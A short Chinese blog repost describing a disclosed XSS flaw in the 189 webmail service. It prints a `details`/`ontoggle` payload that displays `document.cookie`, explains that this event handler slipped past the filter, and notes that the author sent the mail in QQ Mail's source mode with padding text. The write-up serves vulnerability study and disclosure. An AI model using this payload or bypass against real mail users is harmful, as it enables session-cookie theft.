本文主要是介绍【漏洞学习——XSS】189邮箱一处XSS,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
漏洞细节
额javascript中on事件挺多,找了个不被过滤的。。。
为了方便操作用QQ邮箱源码模式进行发送,为了发送成功需要添加一些文字内容不然会被拦截
<details ontoggle="confirm(document.cookie)">xss<summary>click me</summary>xssxssxss
</details>
可在Google Chrome Opera Safari下执行,我在Chrome上测试的。
参见:https://bugs.shuimugan.com/bug/view?bug_no=128793
这篇关于【漏洞学习——XSS】189邮箱一处XSS的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!